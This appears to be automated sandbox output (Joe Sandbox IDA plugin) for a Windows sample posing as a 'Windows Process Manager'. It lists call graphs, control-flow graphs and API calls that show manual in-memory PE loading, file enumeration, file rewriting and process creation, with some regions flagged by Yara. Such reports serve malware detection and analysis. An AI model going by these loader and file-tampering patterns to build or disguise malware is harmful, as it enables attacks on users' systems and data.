23350 530456 GetPEB 23349->23350 23353 530089 23350->23353 23351 5300e4 GetNativeSystemInfo 23352 530107 VirtualAlloc 23351->23352 23357 530029 23351->23357 23355 53012f 23352->23355 23353->23351 23353->23357 23354 5303b2 23361 6427b0 23354->23361 23355->23354 23356 530388 VirtualProtect 23355->23356 23356->23355 23356->23357 23360 530045 23359->23360 23360->23342 23364 641000 23361->23364 23367 641030 LoadLibraryW GetProcAddress 23364->23367 23408 641b30 23367->23408 23370 641091 SetLastError 23404 64102b ExitProcess 23370->23404 23371 6410a3 23372 641b30 SetLastError 23371->23372 23373 6410b9 23372->23373 23374 6410f0 23373->23374 23375 6410de SetLastError 23373->23375 23373->23404 23376 641111 23374->23376 23377 6410ff SetLastError 23374->23377 23375->23404 23378 64111c SetLastError 23376->23378 23380 64112e GetNativeSystemInfo 23376->23380 23377->23404 23378->23404 23381 6411bc 23380->23381 23382 6411d7 SetLastError 23381->23382 23383 6411e9 23381->23383 23382->23404 23411 641800 VirtualAlloc 23383->23411 23384 641202 23385 64123d GetProcessHeap RtlAllocateHeap 23384->23385 23412 641800 VirtualAlloc 23384->23412 23386 641257 SetLastError 23385->23386 23387 64127b 23385->23387 23386->23404 23391 641b30 SetLastError 23387->23391 23388 641222 23388->23385 23389 64122e SetLastError 23388->23389 23389->23404 23392 6412fb 23391->23392 23399 641302 23392->23399 23413 641800 VirtualAlloc 23392->23413 23393 641320 23414 641b50 23393->23414 23396 64136b 23396->23399 23420 6421a0 23396->23420 23439 6416c0 GetProcessHeap HeapFree VirtualFree 23399->23439 23401 6413ca 23401->23399 23402 6413eb 23401->23402 23403 6413ff GetPEB 23402->23403 23402->23404 23403->23404 23409 641070 23408->23409 23410 641b3b SetLastError 23408->23410 23409->23370 23409->23371 23409->23404 23410->23409 23411->23384 23412->23388 23413->23393 23417 641b7d 23414->23417 23415 641b30 SetLastError 23416 641c32 23415->23416 23418 641be9 23416->23418 23440 641800 VirtualAlloc 23416->23440 23417->23415 23417->23418 23418->23396 23421 6413b5 23420->23421 23422 6421dd IsBadHugeReadPtr 23420->23422 23421->23399 23433 641e80 23421->23433 23422->23421 23424 642207 23422->23424 23424->23421 23425 64224d 23424->23425 23426 642239 SetLastError 23424->23426 23441 641a20 VirtualQuery VirtualFree VirtualAlloc 23425->23441 23426->23421 23428 642267 23429 642273 SetLastError 23428->23429 23432 64229d 23428->23432 23429->23421 23431 6423ae SetLastError 23431->23421 23432->23421 23432->23431 23436 641eba 23433->23436 23434 641fe5 23435 641d10 2 API calls 23434->23435 23438 641fc1 23435->23438 23436->23434 23436->23438 23442 641d10 23436->23442 23438->23401 23439->23404 23440->23418 23441->23428 23443 641d29 23442->23443 23447 641d1f 23442->23447 23444 641d37 23443->23444 23445 641d9d VirtualProtect 23443->23445 23444->23447 23449 641820 VirtualFree 23444->23449 23445->23447 23447->23436 23449->23447 23599 642430 VirtualProtect VirtualProtect 23600 642630 Process32Next CloseHandle 23450 627e39 23462 627e32 23450->23462 23451 62809a 23452 6280b9 23451->23452 23463 623e40 GetPEB 23451->23463 23454 623480 GetPEB 23454->23462 23455 628037 SetFileInformationByHandle 23455->23462 23456 627ec8 CreateFileW 23456->23452 23456->23462 23457 6280ad 23464 623da0 GetPEB 23457->23464 23458 627fd6 23460 623e40 GetPEB 23460->23462 23461 623da0 GetPEB 23461->23462 23462->23451 23462->23454 23462->23455 23462->23456 23462->23458 23462->23460 23462->23461 23463->23457 23464->23452 23666 414920 5 API calls 2 library calls 23473 41092e 23523 411e80 23473->23523 23475 41093a GetStartupInfoW 23476 41094e HeapSetInformation 23475->23476 23478 410959 23475->23478 23476->23478 23524 412a4c HeapCreate 23478->23524 23479 4109a7 23480 4109b2 23479->23480 23550 410905 66 API calls 3 library calls 23479->23550 23551 413a77 86 API calls 4 library calls 23480->23551 23483 4109b8 23484 4109c4 __RTC_Initialize 23483->23484 23485 4109bc 23483->23485 23525 4143af 73 API calls __calloc_crt 23484->23525 23552 410905 66 API calls 3 library calls 23485->23552 23487 4109c3 23487->23484 23489 4109d1 23490 4109d5 23489->23490 23491 4109dd GetCommandLineA 23489->23491 23553 412820 66 API calls 3 library calls 23490->23553 23526 414318 71 API calls 2 library calls 23491->23526 23495 4109ed 23554 41425d 95 API calls 3 library calls 23495->23554 23497 4109f7 23498 410a03 23497->23498 23499 4109fb 23497->23499 23527 413fe7 94 API calls 7 library calls 23498->23527 23555 412820 66 API calls 3 library calls 23499->23555 23503 410a08 23504 410a14 23503->23504 23505 410a0c 23503->23505 23528 4125ff 77 API calls 4 library calls 23504->23528 23556 412820 66 API calls 3 library calls 23505->23556 23509 410a1b 23510 410a20 23509->23510 23511 410a27 23509->23511 23557 412820 66 API calls 3 library calls 23510->23557 23529 413f88 94 API calls 2 library calls 23511->23529 23514 410a2c 23516 410a32 23514->23516 23530 40fa80 23514->23530 23516->23514 23518 410a48 23519 410a56 23518->23519 23558 4127d6 66 API calls _doexit 23518->23558 23559 412802 66 API calls _doexit 23519->23559 23522 410a5b _wprintf 23523->23475 23524->23479 23525->23489 23526->23495 23527->23503 23528->23509 23529->23514 23560 4101c0 23530->23560 23533 40fb38 23534 40fb3d RegisterClassExW 23533->23534 23535 40fb6e CreateWindowExW 23534->23535 23536 40fb4f MessageBoxW 23534->23536 23537 40fbb1 MessageBoxW 23535->23537 23538 40fbcf CreateWindowExW CreateWindowExW CreateWindowExW 23535->23538 23536->23518 23537->23518 23562 40e7b0 InitCommonControlsEx CreateWindowExW 23538->23562 23540 40fc70 23563 40e800 11 API calls CatchGuardHandler 23540->23563 23542 40fc7b CreateWindowExW CreateWindowExW CreateWindowExW CreateWindowExW 23564 40e220 9 API calls CatchGuardHandler 23542->23564 23544 40fd48 23565 40f770 143 API calls 23544->23565 23546 40fd4d SetTimer ShowWindow UpdateWindow GetMessageW 23547 40fdc3 23546->23547 23548 40fd97 23546->23548 23547->23518 23549 40fda4 TranslateMessage DispatchMessageW GetMessageW 23548->23549 23549->23547 23549->23549 23550->23480 23551->23483 23552->23487 23554->23497 23558->23519 23559->23522 23561 40fa93 LoadIconW LoadCursorW LoadIconW CreateThread 23560->23561 23561->23533 23566 40ecc0 23561->23566 23562->23540 23563->23542 23564->23544 23565->23546 23567 40ecc6 23566->23567 23670 40e930 81 API calls CatchGuardHandler 23607 418a30 76 API calls __cinit 23608 413e30 SetUnhandledExceptionFilter 23671 627b10 FindFirstFileW FindNextFileW FindClose GetPEB 23610 62640d 18 API calls 23675 6421ea 7 API calls 23621 411ee0 6 API calls 3 library calls 23623 4122ed IsProcessorFeaturePresent 23626 412cee 69 API calls IsInExceptionSpec 23683 40edf0 66 API calls std::exception::exception 23033 40ea80 23038 41025b 23033->23038 23036 41025b __crtLCMapStringA_stat 66 API calls 23037 40ea9b 23036->23037 23039 4102d8 23038->23039 23050 410269 23038->23050 23061 412a79 DecodePointer 23039->23061 23041 4102de 23062 411e2c 66 API calls __getptd_noexit 23041->23062 23044 410297 RtlAllocateHeap 23044->23050 23054 40ea93 23044->23054 23046 4102c4 23059 411e2c 66 API calls __getptd_noexit 23046->23059 23050->23044 23050->23046 23051 4102c2 23050->23051 23052 410274 23050->23052 23058 412a79 DecodePointer 23050->23058 23060 411e2c 66 API calls __getptd_noexit 23051->23060 23052->23050 23055 412a13 66 API calls __NMSG_WRITE 23052->23055 23056 412864 66 API calls 6 library calls 23052->23056 23057 41257e GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 23052->23057 23054->23036 23055->23052 23056->23052 23058->23050 23059->23051 23060->23054 23061->23041 23062->23054 23630 410881 67 API calls __calloc_crt 23632 6414a0 9 API calls 23687 413787 TlsAlloc 23634 530c9f GetPEB 23691 410d8f 107 API calls 3 library calls 23638 6426b0 wcslen wcslen wcslen 23639 40f5e0 137 API calls 2 library calls 23640 410a9b 5 API calls ___security_init_cookie 23304 624a80 23305 624a92 23304->23305 23308 624aa8 23304->23308 23326 623e40 GetPEB 23305->23326 23307 624a9c 23327 623da0 GetPEB 23307->23327 23310 624ae7 CreateProcessW 23308->23310 23328 623e40 GetPEB 23308->23328 23311 624b83 23310->23311 23312 624b07 23310->23312 23314 624b0f 23312->23314 23317 624b43 23312->23317 23330 623e40 GetPEB 23312->23330 23315 624ad6 23329 623da0 GetPEB 23315->23329 23322 624b6d 23317->23322 23332 623e40 GetPEB 23317->23332 23318 624ae2 23318->23310 23320 624b37 23331 623da0 GetPEB 23320->23331 23324 624b61 23333 623da0 GetPEB 23324->23333 23326->23307 23327->23308 23328->23315 23329->23318 23330->23320 23331->23317 23332->23324 23333->23322 23701 40f3b0 RaiseException __CxxThrowException@8 23702 40f7b0 162 API calls CatchGuardHandler 23645 641890 FreeLibrary

                                    Control-flow Graph

                                    APIs
                                    • _memset.LIBCMT ref: 0040FA8E
                                    • LoadIconW.USER32 ref: 0040FAD2
                                    • LoadCursorW.USER32(00000000,00007F00), ref: 0040FADF
                                    • LoadIconW.USER32 ref: 0040FB0B
                                    • CreateThread.KERNELBASE(00000000,00000000,Function_0000ECC0,00000000,00000002,?), ref: 0040FB23
                                    • RegisterClassExW.USER32(?), ref: 0040FB42
                                    • MessageBoxW.USER32(00000000,Call to RegisterClassEx failed!,Create Process,00000000), ref: 0040FB5B
                                    • CreateWindowExW.USER32(00000000,win32app,Windows Process Manager,00CF0000,80000000,80000000,000001B8,00000258,00000000,00000000,?,00000000), ref: 0040FBA4
                                    • MessageBoxW.USER32(00000000,Call to CreateWindow failed!,Win32 Guided Tour,00000000), ref: 0040FBBC
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1674807512.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.1674790141.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000000.00000002.1674827448.0000000000419000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000000.00000002.1674845323.000000000041D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000000.00000002.1674862376.0000000000422000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ExeFile (317).jbxd
                                    Similarity
                                    • API ID: Load$CreateIconMessage$ClassCursorRegisterThreadWindow_memset
                                    • String ID: 0$BUTTON$Call to CreateWindow failed!$Call to RegisterClassEx failed!$Cancel$Create Process$Edit$Kill Process$Run$View All Processes$Win32 Guided Tour$Windows Process Manager$win32app
                                    • API String ID: 713769167-1192827546
                                    • Opcode ID: 952da5468408a189c14926ca3cf5cae3a85ce14d76ca3222c90a6cd4c0bb2d80
                                    • Instruction ID: d065e50bf912697da28d798f56a1b3ea1efd5d731bf56130ae663ba60a7ce2a6
                                    • Opcode Fuzzy Hash: 952da5468408a189c14926ca3cf5cae3a85ce14d76ca3222c90a6cd4c0bb2d80
                                    • Instruction Fuzzy Hash: 9A8120B1BD4300BAF220DB50DC56FDA37A8AB98F05F10842AF7017A2D0D7F969458B5E

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 22 641030-641075 LoadLibraryW GetProcAddress call 641b30 25 641077-641079 22->25 26 64107e-64108f 22->26 27 64148d-641490 25->27 28 641091-64109e SetLastError 26->28 29 6410a3-6410be call 641b30 26->29 28->27 32 6410c7-6410dc 29->32 33 6410c0-6410c2 29->33 34 6410f0-6410fd 32->34 35 6410de-6410eb SetLastError 32->35 33->27 36 641111-64111a 34->36 37 6410ff-64110c SetLastError 34->37 35->27 38 64111c-641129 SetLastError 36->38 39 64112e-64114f 36->39 37->27 38->27 40 641163-64116d 39->40 41 6411a5-6411d5 GetNativeSystemInfo call 6418d0 * 2 40->41 42 64116f-641176 40->42 53 6411d7-6411e4 SetLastError 41->53 54 6411e9-64120c call 641800 41->54 44 641186-641192 42->44 45 641178-641184 42->45 47 641195-64119b 44->47 45->47 49 6411a3 47->49 50 64119d-6411a0 47->50 49->40 50->49 53->27 56 64123d-641255 GetProcessHeap RtlAllocateHeap 54->56 57 64120e-64121f call 641800 54->57 58 641257-641276 SetLastError 56->58 59 64127b-641291 56->59 62 641222-64122c 57->62 58->27 60 641293-64129a 59->60 61 64129c 59->61 63 6412a3-641300 call 641b30 60->63 61->63 62->56 64 64122e-641238 SetLastError 62->64 68 641307-641370 call 641800 call 641980 call 641b50 63->68 69 641302 63->69 64->27 78 641377-641388 68->78 79 641372 68->79 70 64147f-64148b call 6416c0 69->70 70->27 80 6413a2-6413a5 78->80 81 64138a-6413a0 call 642090 78->81 79->70 83 6413ac-6413ba call 6421a0 80->83 81->83 87 6413c1-6413c5 call 641e80 83->87 88 6413bc 83->88 90 6413ca-6413cf 87->90 88->70 91 6413d6-6413e4 call 642010 90->91 92 6413d1 90->92 95 6413e6 91->95 96 6413eb-6413f4 91->96 92->70 95->70 97 6413f6-6413fd 96->97 98 641470-641473 96->98 99 64145d-64146b 97->99 100 6413ff-64145b GetPEB 97->100 101 64147a-64147d 98->101 102 64146e 99->102 100->102 101->27 102->101
                                    APIs
                                    • LoadLibraryW.KERNEL32(00644054,00644040), ref: 00641047
                                    • GetProcAddress.KERNEL32(00000000), ref: 0064104E
                                      • Part of subcall function 00641B30: SetLastError.KERNEL32(0000000D,?,00641070,?,00000040), ref: 00641B3D
                                    • SetLastError.KERNEL32(000000C1), ref: 00641096
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1675098007.0000000000641000.00000020.00001000.00020000.00000000.sdmp, Offset: 00641000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_641000_ExeFile (317).jbxd
                                    Similarity
                                    • API ID: ErrorLast$AddressLibraryLoadProc
                                    • String ID:
                                    • API String ID: 1866314245-0
                                    • Opcode ID: 22d3bdbc3ceed4f118dc2c6b5d7d9316d2904f28c6ad43b95a383f7d59765123
                                    • Instruction ID: 866c473cf092e34b4578d9bf0cca051f2bc305eccb6f035f271d5a978240096c
                                    • Opcode Fuzzy Hash: 22d3bdbc3ceed4f118dc2c6b5d7d9316d2904f28c6ad43b95a383f7d59765123
                                    • Instruction Fuzzy Hash: 07F10AB4A00209EFDB04DF94D980BAEB7B2FF49304F208559E915AB351D735EE81DB90

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 107 627d60-627e2a 108 627e32-627e37 107->108 109 627e40-627e45 108->109 110 627e4b 109->110 111 627fa8-627fad 109->111 112 627e51-627e56 110->112 113 62809a-6280a1 110->113 114 628052-628095 call 62b400 111->114 115 627fb3-627fb8 111->115 119 627efc-627f10 call 623480 112->119 120 627e5c-627e61 112->120 117 6280a3-6280b9 call 623e40 call 623da0 113->117 118 6280be 113->118 114->109 121 627fe3-62801a 115->121 122 627fba-627fbf 115->122 117->118 138 6280c1-6280cd 118->138 145 627f12-627f2a call 623e40 call 623da0 119->145 146 627f30-627f53 119->146 125 627e63-627e68 120->125 126 627ea0-627ea8 120->126 130 628037-62804d SetFileInformationByHandle 121->130 131 62801c-628032 call 623e40 call 623da0 121->131 127 627fc1-627fc6 122->127 128 627fcb-627fd0 122->128 125->128 135 627e6e-627e75 125->135 132 627eaa-627ec2 call 623e40 call 623da0 126->132 133 627ec8-627eec CreateFileW 126->133 127->109 128->109 136 627fd6-627fe2 128->136 130->109 131->130 132->133 133->138 141 627ef2-627ef7 133->141 143 627e92-627e9e 135->143 144 627e77-627e8d call 623e40 call 623da0 135->144 141->109 143->109 144->143 145->146 160 627f70-627f7b 146->160 161 627f55-627f6b call 623e40 call 623da0 146->161 170 627f98-627fa3 160->170 171 627f7d-627f93 call 623e40 call 623da0 160->171 161->160 170->108 171->170
                                    APIs
                                    • CreateFileW.KERNELBASE(?,?,?,00000000,000A8C00,0100754F,00000000,000A8C00,?,00989680,?,?,00000000), ref: 00627EE5
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1675028418.0000000000621000.00000020.00001000.00020000.00000000.sdmp, Offset: 00620000, based on PE: true
                                    • Associated: 00000000.00000002.1675014188.0000000000620000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000000.00000002.1675045503.000000000062D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_620000_ExeFile (317).jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CreateFile
                                    • String ID: DR$Ou$fX
                                    • API String ID: 823142352-261343277
                                    • Opcode ID: 6f399132a2372e350f576e7c4786fffcb2916669fc8f79cce65356c6cd7a1c60
                                    • Instruction ID: 827df06a0e37ac508cc7b8534f8b59ac63518f69f1b3732b90be5af2ccb4fa76
                                    • Opcode Fuzzy Hash: 6f399132a2372e350f576e7c4786fffcb2916669fc8f79cce65356c6cd7a1c60
                                    • Instruction Fuzzy Hash: 3F819C71608B118FD768DF68A945A2BB6E6AB88704F40092DF185C7390DB78DE098F97

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 178 6238b0-6238cb 179 6238d0-6238d5 178->179 180 623a85-623a8a 179->180 181 6238db 179->181 184 623af1-623af8 180->184 185 623a8c-623a91 180->185 182 6238e1-6238e6 181->182 183 623a7b-623a80 181->183 188 623b30-623b37 182->188 189 6238ec-6238f1 182->189 183->179 190 623b15-623b2b FindNextFileW 184->190 191 623afa-623b10 call 623e40 call 623da0 184->191 186 623a93-623a9a 185->186 187 623adb-623ae0 185->187 192 623ab7-623acb FindFirstFileW 186->192 193 623a9c-623ab2 call 623e40 call 623da0 186->193 187->179 198 623ae6-623af0 187->198 194 623b54-623b55 FindClose 188->194 195 623b39-623b4f call 623e40 call 623da0 188->195 196 6239d7-6239ea call 623480 189->196 197 6238f7-6238fc 189->197 190->179 191->190 203 623ad1-623ad6 192->203 204 623b57-623b61 192->204 193->192 194->204 195->194 215 623a07-623a22 196->215 216 6239ec-623a02 call 623e40 call 623da0 196->216 197->187 205 623902-623907 197->205 203->179 210 6239b1-6239d2 205->210 211 62390d-623913 205->211 210->179 217 623934-623936 211->217 218 623915-62391d 211->218 233 623a24-623a3a call 623e40 call 623da0 215->233 234 623a3f-623a4a 215->234 216->215 220 623938-62394b call 623480 217->220 221 62392d-623932 217->221 218->221 226 62391f-623923 218->226 235 623968-623998 call 6238b0 220->235 236 62394d-623963 call 623e40 call 623da0 220->236 221->179 226->217 230 623925-62392b 226->230 230->217 230->221 233->234 244 623a67-623a76 234->244 245 623a4c-623a62 call 623e40 call 623da0 234->245 254 62399d-6239ac call 623420 235->254 236->235 244->179 245->244 254->179
                                    APIs
                                    • FindFirstFileW.KERNELBASE(?,?,?,33A6B453,00000001,00000000), ref: 00623AC4
                                    • FindNextFileW.KERNELBASE(?,?,?,33A6B453,00000001,00000000), ref: 00623B1B
                                    • FindClose.KERNELBASE(?), ref: 00623B55
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1675028418.0000000000621000.00000020.00001000.00020000.00000000.sdmp, Offset: 00620000, based on PE: true
                                    • Associated: 00000000.00000002.1675014188.0000000000620000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000000.00000002.1675045503.000000000062D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_620000_ExeFile (317).jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Find$File$CloseFirstNext
                                    • String ID: *LO$.
                                    • API String ID: 3541575487-2132576683
                                    • Opcode ID: 467f761bc53810abb769049f6c1a20c07bee4b0f25e078fb8a671ee60fa95854
                                    • Instruction ID: a5876668535299059cfd84c847b96f80b72b640265665db95b8abc0adc637c74
                                    • Opcode Fuzzy Hash: 467f761bc53810abb769049f6c1a20c07bee4b0f25e078fb8a671ee60fa95854
                                    • Instruction Fuzzy Hash: A951F3B1704A7147CB74AB74B941ABB72A79B94740F40482EF585CB381EB3DCE468F52

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 259 6280d0-62819c 260 6281a1-6281a7 259->260 261 62826e-628274 260->261 262 6281ad 260->262 263 628300-628307 261->263 264 62827a-628280 261->264 265 6281b3-6281b9 262->265 266 628264-628269 262->266 269 628324-628337 263->269 270 628309-62831f call 623e40 call 623da0 263->270 267 628282-628289 264->267 268 6282e9-6282ef 264->268 271 6281bf-6281c5 265->271 272 62833c-628384 call 62b400 265->272 266->260 273 6282a6-6282c9 267->273 274 62828b-6282a1 call 623e40 call 623da0 267->274 268->260 275 6282f5-6282ff 268->275 269->260 270->269 277 6281c7-6281cd 271->277 278 62822f-628236 271->278 272->275 293 62838a 272->293 300 6282e6 273->300 301 6282cb-6282e1 call 623e40 call 623da0 273->301 274->273 277->268 285 6281d3-6281db 277->285 282 628253-62825f 278->282 283 628238-62824e call 623e40 call 623da0 278->283 282->260 283->282 291 6281fb-62821f CreateFileW 285->291 292 6281dd-6281f5 call 623e40 call 623da0 285->292 291->275 296 628225-62822a 291->296 292->291 294 628394-6283a1 293->294 295 62838c-62838e 293->295 295->275 295->294 296->260 300->268 301->300
                                    APIs
                                    • CreateFileW.KERNELBASE(?,?,?,00000000,?,0100754F,00000000), ref: 00628218
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1675028418.0000000000621000.00000020.00001000.00020000.00000000.sdmp, Offset: 00620000, based on PE: true
                                    • Associated: 00000000.00000002.1675014188.0000000000620000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000000.00000002.1675045503.000000000062D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_620000_ExeFile (317).jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CreateFile
                                    • String ID: DR$Ou$m
                                    • API String ID: 823142352-902897619
                                    • Opcode ID: f0f6aacdb1b63d6fa72f53d5f7c7711a07e4749b5efcd7d7dcdf50ac1f07af14
                                    • Instruction ID: 6d75d4e34b8896605f38294700fad6d3f62429efb8c111dc0c84afcc4676c947
                                    • Opcode Fuzzy Hash: f0f6aacdb1b63d6fa72f53d5f7c7711a07e4749b5efcd7d7dcdf50ac1f07af14
                                    • Instruction Fuzzy Hash: BD61AD31A09B218FD754DF68EC49A6FB6E2ABD4714F00491DF49597390DBB8CA098F83

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 635 624f50-624f67 636 624f6c 635->636 637 624f70-624f76 636->637 638 62518a-625190 637->638 639 624f7c 637->639 640 625196 638->640 641 62526e-625274 638->641 642 624f82-624f88 639->642 643 625120-625127 639->643 648 625264-625269 640->648 649 62519c-6251a2 640->649 644 625283-62528a 641->644 645 625276-62527c 641->645 650 62507e-625084 642->650 651 624f8e 642->651 646 625144-62514f 643->646 647 625129-62513f call 623e40 call 623da0 643->647 656 6252a7-6252b2 644->656 657 62528c-6252a2 call 623e40 call 623da0 644->657 652 6252d5-6252dc 645->652 653 62527e 645->653 679 625151-625167 call 623e40 call 623da0 646->679 680 62516c-62517a RtlAllocateHeap 646->680 647->646 648->637 659 6251d0-6251d7 649->659 660 6251a4-6251aa 649->660 654 625086-62508c 650->654 655 6250aa-6250b1 650->655 661 625022-625029 651->661 662 624f94-624f9a 651->662 653->636 654->645 670 625092-6250a5 654->670 672 6250b3-6250c9 call 623e40 call 623da0 655->672 673 6250ce-6250f8 655->673 700 6252b4-6252ca call 623e40 call 623da0 656->700 701 6252cf-6252d3 RtlFreeHeap 656->701 657->656 663 6251f4-625216 659->663 664 6251d9-6251ef call 623e40 call 623da0 659->664 660->645 675 6251b0-6251cb call 6241c0 660->675 668 625046-625051 661->668 669 62502b-625041 call 623e40 call 623da0 661->669 666 624fdc-624fe3 662->666 667 624f9c-624fa2 662->667 709 624fd5-624fda 663->709 710 62521c-625223 663->710 664->663 684 625000-62501d 666->684 685 624fe5-624ffb call 623e40 call 623da0 666->685 667->645 681 624fa8-624faf 667->681 711 625053-625069 call 623e40 call 623da0 668->711 712 62506e-625079 668->712 669->668 670->637 672->673 704 625115-62511b 673->704 705 6250fa-625110 call 623e40 call 623da0 673->705 675->636 679->680 680->652 696 625180-625185 680->696 694 624fb1-624fc7 call 623e40 call 623da0 681->694 695 624fcc-624fcf 681->695 684->636 685->684 694->695 695->709 696->636 700->701 701->652 704->645 705->704 709->636 723 625240-62525f 710->723 724 625225-62523b call 623e40 call 623da0 710->724 711->712 712->636 723->637 724->723
                                    APIs
                                    • RtlAllocateHeap.NTDLL(00000000,00000008,00020000,?,?,006287E4,?,33A6B453,?,?), ref: 00625174
                                    • RtlFreeHeap.NTDLL(00000000,00000000,00000000,?,?,006287E4,?,33A6B453,?,?), ref: 006252D3
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1675028418.0000000000621000.00000020.00001000.00020000.00000000.sdmp, Offset: 00620000, based on PE: true
                                    • Associated: 00000000.00000002.1675014188.0000000000620000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000000.00000002.1675045503.000000000062D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_620000_ExeFile (317).jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateFree
                                    • String ID:
                                    • API String ID: 2488874121-0
                                    • Opcode ID: 462578a459719a7919daae5631e54795450d279dd156247d0313dda080ed231b
                                    • Instruction ID: bc16c294ba1ee583720b1ea23838b977cb47684a193a9cc711525d6e83c51ecf
                                    • Opcode Fuzzy Hash: 462578a459719a7919daae5631e54795450d279dd156247d0313dda080ed231b
                                    • Instruction Fuzzy Hash: 9F81C331B00F319BDB74ABB8AC95B6A72976FC8740F454829F942DB390EB749D014F86

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 758 623060-623076 759 62307a-62307f 758->759 760 623080-623085 759->760 761 6231e1-6231e6 760->761 762 62308b 760->762 765 6231e8-6231ed 761->765 766 62325c-62326a call 623c80 761->766 763 623091-623096 762->763 764 623177-62317e 762->764 767 623164-623172 763->767 768 62309c-6230a1 763->768 769 623180-623196 call 623e40 call 623da0 764->769 770 62319b-6231a6 764->770 772 623222-62322a 765->772 773 6231ef-6231f4 765->773 766->759 767->760 774 6230a7-6230ac 768->774 775 62326f-623277 768->775 769->770 795 6231c3-6231d1 RtlAllocateHeap 770->795 796 6231a8-6231be call 623e40 call 623da0 770->796 780 62324a-623257 772->780 781 62322c-623244 call 623e40 call 623da0 772->781 778 6231f6-6231fa 773->778 779 62320a-62320f 773->779 774->779 782 6230b2-62315f 774->782 784 623297-6232b7 775->784 785 623279-623291 call 623e40 call 623da0 775->785 786 623200-623205 778->786 787 6232ba-6232c4 778->787 779->760 788 623215-62321f 779->788 780->759 781->780 782->759 784->787 785->784 786->760 795->787 800 6231d7-6231dc 795->800 796->795 800->759
                                    APIs
                                    • RtlAllocateHeap.NTDLL(00000000,00000008,00000220), ref: 006231CB
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1675028418.0000000000621000.00000020.00001000.00020000.00000000.sdmp, Offset: 00620000, based on PE: true
                                    • Associated: 00000000.00000002.1675014188.0000000000620000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000000.00000002.1675045503.000000000062D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_620000_ExeFile (317).jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AllocateHeap
                                    • String ID:
                                    • API String ID: 1279760036-0
                                    • Opcode ID: 2ddaaa236cbf3576daacb99f9e24a1692552b221a49b5fff132916cca5c80bb1
                                    • Instruction ID: 34c4c661f7ea78d071dbeb4409721411b275f273e8b8f35ff6e6d760207ffe7a
                                    • Opcode Fuzzy Hash: 2ddaaa236cbf3576daacb99f9e24a1692552b221a49b5fff132916cca5c80bb1
                                    • Instruction Fuzzy Hash: F051B631704B218BC758CF68A49456EB7E6ABD8340F104D2EF546CB350D738DE4A8F92

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 314 626d70-626d77 315 626d80-626d85 314->315 316 626e14-626e19 315->316 317 626d8b 315->317 320 626eee-626ef3 316->320 321 626e1f 316->321 318 626dfb-626e0f call 626cd0 317->318 319 626d8d-626d92 317->319 318->315 323 626d94 319->323 324 626dde-626de3 319->324 325 626da8-626dad 320->325 326 626ef9-626f0a call 626cd0 320->326 327 626e21-626e26 321->327 328 626e56-626e69 call 623480 321->328 332 626d96-626d9b 323->332 333 626dc8-626ddc call 626cd0 323->333 324->325 330 626de5-626df9 call 626cd0 324->330 325->315 334 626daf-626db1 325->334 326->315 336 626e28-626e2d 327->336 337 626e3d-626e51 call 626cd0 327->337 348 626e86-626e99 LoadLibraryW 328->348 349 626e6b-626e81 call 623e40 call 623da0 328->349 330->315 341 626db2-626dc6 call 626cd0 332->341 342 626d9d-626da2 332->342 333->315 336->325 344 626e33-626e38 336->344 337->315 341->315 342->325 351 626f0f-626f1a 342->351 344->315 354 626eb6-626ec1 348->354 355 626e9b-626eb1 call 623e40 call 623da0 348->355 349->348 362 626ec3-626ed9 call 623e40 call 623da0 354->362 363 626ede-626ee9 354->363 355->354 362->363 363->315
                                    APIs
                                      • Part of subcall function 00626CD0: LoadLibraryW.KERNELBASE(00000000,?,33A6B453,00626F05,?,33A6B453,006268AC), ref: 00626D00
                                    • LoadLibraryW.KERNELBASE(00000000,?,33A6B453,006268AC), ref: 00626E87
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1675028418.0000000000621000.00000020.00001000.00020000.00000000.sdmp, Offset: 00620000, based on PE: true
